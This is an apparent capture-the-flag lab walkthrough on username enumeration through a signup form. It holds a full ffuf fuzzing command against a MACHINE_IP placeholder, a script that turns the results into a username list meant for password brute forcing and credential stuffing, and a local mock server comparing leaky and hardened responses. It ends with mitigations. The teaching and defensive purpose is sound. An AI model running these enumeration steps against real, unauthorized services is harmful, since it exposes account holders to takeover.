Practical Step-by-Step Authentication Testing Guide
Introduction
Authentication mechanisms often leak information through their error messages. One common weakness is username enumeration: the application tells the client whether a given username already exists, so an attacker can turn a generic wordlist into a list of real accounts.
In this practical exercise, we will:
Identify valid usernames
Use ffuf for automated fuzzing
Extract confirmed usernames
Create a usable list for further authentication testing
Target endpoint:
http://MACHINE_IP/customers/signup
1️⃣ Understanding the Vulnerability
Visit:
http://MACHINE_IP/customers/signup
Try registering with:
Username: admin
Email: test@test.com
Password: test123
Confirm Password: test123
If you receive:
An account with this username already exists
This confirms:
The username exists
The application leaks information
The system is vulnerable to username enumeration
This behavior allows attackers to build a list of valid accounts.
2️⃣ Lab Requirements
You need:
Kali Linux / TryHackMe AttackBox
ffuf installed
SecLists wordlist
Check if ffuf is installed:
ffuf -h
If not installed:
sudo apt install ffuf
Install SecLists if needed:
sudo apt install seclists
Wordlist path on the TryHackMe AttackBox:
/usr/share/wordlists/SecLists/Usernames/Names/names.txt
On Kali the seclists package installs to /usr/share/seclists, so the same list lives at /usr/share/seclists/Usernames/Names/names.txt there; adjust the -w argument below to match your system.
3️⃣ Crafting the FFUF Command
We will send POST requests to the signup form.
Full Command:
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt \
-X POST \
-d "username=FUZZ&email=test@test.com&password=test123&cpassword=test123" \
-H "Content-Type: application/x-www-form-urlencoded" \
-u http://MACHINE_IP/customers/signup \
-mr "username already exists"
4️⃣ Breaking Down the Command
| Parameter | Purpose |
|---|---|
| -w | Wordlist location |
| -X POST | Send a POST request instead of the default GET |
| -d | Form body (POST data) |
| FUZZ | Placeholder replaced by each wordlist entry |
| -H | Content-Type header so the server parses the body as a form |
| -u | Target URL |
| -mr | Show only responses whose body matches this regex (here a substring of the full error message) |
The keyword FUZZ is replaced automatically by each entry from the wordlist.
5️⃣ Running the Attack
Execute the command.
ffuf will:
Send thousands of POST requests
Insert each username into the form
Check responses
Display only matches containing:
username already exists
6️⃣ Interpreting Results
Example output (ffuf prints one line per match, followed by the status code, size, word and line counts of that response):
admin
john
michael
david
Each username listed is one whose response body contained the match string, so these accounts exist. Candidates that produced no match are not printed. Before relying on the list, spot-check one or two names by hand in the browser and glance at the status codes ffuf reports: a burst of unexpected codes (for example 429 or 5xx) means the server started rejecting requests and the scan must be rerun more slowly.
7️⃣ Creating valid_usernames.txt
Now create a file:
nano valid_usernames.txt
Add discovered usernames:
admin
john
michael
david
Save the file.
Verify:
cat valid_usernames.txt
8️⃣ Automating Output Saving (Optional)
Instead of copying manually:
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt \
-X POST \
-d "username=FUZZ&email=test@test.com&password=test123&cpassword=test123" \
-H "Content-Type: application/x-www-form-urlencoded" \
-u http://MACHINE_IP/customers/signup \
-mr "username already exists" \
-of csv -o results.csv
The first column of results.csv holds the FUZZ value, i.e. the matched username; extract that column, drop the header line, and save it as valid_usernames.txt.
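The following script turns ffuf's CSV output into valid_usernames.txt. It is an added example, not code from the original post. The sample CSV is constructed here in the column layout ffuf's CSV writer uses (keyword column first, then url, redirectlocation, position, status_code and so on); check the header line of your own results.csv and change the keyword argument if it differs. Beyond a plain column cut, it drops duplicate names (for example when two runs were appended) and rows whose status code is not the one the confirming page returns, since a matching string inside a 5xx or 429 error page is noise rather than a confirmed user.

```python
"""Extract confirmed usernames from ffuf -of csv output.

Added example, not from the original post. SAMPLE_CSV is constructed; the
numbers and durations are placeholders, not captured data.
"""
import csv
import io

# Constructed sample in ffuf's CSV layout (assumed: header row names the
# keyword column "FUZZ"). One duplicate and one 500 row are included on
# purpose to show how the filter treats them.
SAMPLE_CSV = """\
FUZZ,url,redirectlocation,position,status_code,content_length,content_words,content_lines,content_type,duration,resultfile
admin,http://MACHINE_IP/customers/signup,,4,200,3670,1120,125,text/html; charset=utf-8,12.3ms,
john,http://MACHINE_IP/customers/signup,,41,200,3670,1120,125,text/html; charset=utf-8,11.8ms,
robert,http://MACHINE_IP/customers/signup,,77,500,1842,310,40,text/html; charset=utf-8,203.1ms,
michael,http://MACHINE_IP/customers/signup,,98,200,3670,1120,125,text/html; charset=utf-8,12.0ms,
john,http://MACHINE_IP/customers/signup,,41,200,3670,1120,125,text/html; charset=utf-8,12.9ms,
david,http://MACHINE_IP/customers/signup,,130,200,3670,1120,125,text/html; charset=utf-8,11.5ms,
"""


def extract_usernames(csv_text, keyword="FUZZ", status=200):
    """Return matched usernames in first-seen order.

    Rows are kept only when their status_code equals the code the confirming
    page returns (200 in the lab); duplicates are collapsed.
    """
    names = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if int(row["status_code"]) != status:
            continue  # error page that happened to contain the match string
        name = row[keyword].strip()
        if name and name not in names:
            names.append(name)
    return names


def format_wordlist(names):
    """One username per line, trailing newline, ready for hydra/ffuf -w."""
    return "".join(f"{n}\n" for n in names)


def write_wordlist(names, path="valid_usernames.txt"):
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(format_wordlist(names))
    return path


if __name__ == "__main__":
    # Real use: open("results.csv").read() in place of SAMPLE_CSV.
    found = extract_usernames(SAMPLE_CSV)
    print(found)
    print("written to", write_wordlist(found))
```

The status filter is deliberately strict: if the confirming page on your target answers with a different code (some apps return 400 or 409 on a duplicate username), pass that value as status.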
9️⃣ Why This Attack Works
The flaw exists because:
The application distinguishes between an existing username and a new one
It reports that distinction to the client through a different error message
A secure application responds identically in both cases (same status code, same body, same length), for example with a generic:
Registration failed
and delivers the real outcome through a channel the attacker cannot observe, such as a confirmation e-mail. Any observable difference, including response length or timing, can be fuzzed for in the same way as the message text.
🔐 Security Mitigation
Developers should:
Use generic error messages that are identical for existing and new usernames
Implement rate limiting per source address and per account
Add CAPTCHA after repeated attempts
Log and alert on bursts of signup or login failures from one source
Rate limiting, CAPTCHA and logging only slow down and expose the enumeration; only the generic, identical response removes the leak itself.
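The whole exercise, from the ffuf-style probing in sections 3 to 6 to the fix described in sections 9 and 10, can be reproduced offline against a local mock. This is an added example and is not code from the original post or from the TryHackMe lab. Everything in it is constructed: the mock signup endpoint on a loopback port, its account set (EXISTING), the short stand-in for names.txt (WORDLIST), and the wording of the hardened response. The vulnerable handler answers exactly as the page describes; the hardened one returns a byte-identical 200 response whether or not the username exists. The enumerator does what ffuf -mr does: POST each candidate with the page's form fields and keep the ones whose body matches the regex.

```python
"""Username enumeration through a signup form, and the fixed form, on a mock.

Added example, not the original post's code. Mock server, account list,
wordlist and hardened message are all constructed here.
"""
import re
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed: the accounts the mock "knows". A real target hides this set.
EXISTING = {"admin", "john", "michael", "david"}
# Constructed stand-in for names.txt.
WORDLIST = ["aaron", "admin", "alice", "david", "john", "michael", "zoe"]
# The regex the page passes to ffuf as -mr (a substring of the full message).
LEAK_PATTERN = re.compile(r"username already exists")


class SignupHandler(BaseHTTPRequestHandler):
    leaky = True  # overridden per server instance, see serve()

    def log_message(self, *args):  # keep the demo quiet
        pass

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        username = form.get("username", [""])[0]
        exists = username in EXISTING
        if self.leaky:
            # Vulnerable: the body depends on whether the account exists.
            body = ("An account with this username already exists" if exists
                    else "Account created")
        else:
            # Hardened: same status, body and length on both paths; the real
            # outcome would go out of band (e-mail), never into this response.
            body = "Registration received. Check your e-mail to continue."
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain; charset=utf-8")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)


def serve(leaky):
    """Start a mock signup endpoint on a free loopback port; return (server, url)."""
    handler = type("Handler", (SignupHandler,), {"leaky": leaky})
    server = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    port = server.server_address[1]
    return server, f"http://127.0.0.1:{port}/customers/signup"


def post_signup(url, username):
    """One signup attempt with the same form fields the page's -d sends."""
    data = urllib.parse.urlencode({
        "username": username, "email": "test@test.com",
        "password": "test123", "cpassword": "test123"}).encode()
    req = urllib.request.Request(
        url, data=data, method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.status, resp.read().decode()


def enumerate_usernames(url, wordlist, pattern=LEAK_PATTERN):
    """What ffuf -mr does: keep candidates whose response body matches."""
    return [u for u in wordlist if pattern.search(post_signup(url, u)[1])]


def responses_differ(url, existing="admin", unknown="zoe"):
    """Differential check: does an existing name get any different response?"""
    return post_signup(url, existing) != post_signup(url, unknown)


if __name__ == "__main__":
    for leaky in (True, False):
        server, url = serve(leaky)
        print("leaky" if leaky else "hardened",
              enumerate_usernames(url, WORDLIST),
              "responses differ:", responses_differ(url))
        server.shutdown()
        server.server_close()
```

responses_differ compares the full (status, body) tuple rather than searching for a string, which is the check to run against a fix: a generic message that still differs in status code or length is not a fix, only a different oracle. Note that the mock never persists anything; a real signup endpoint would create an account for every unknown name the enumerator sends.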
🎯 Final Outcome
At the end of this exercise, you should have:
valid_usernames.txt
Containing confirmed usernames for:
Password brute forcing
Credential stuffing
Further authentication testing
Educational Purpose Notice
This exercise must only be performed:
In lab environments
On machines you are authorized to test
In platforms like TryHackMe or HackTheBox
Unauthorized testing is illegal.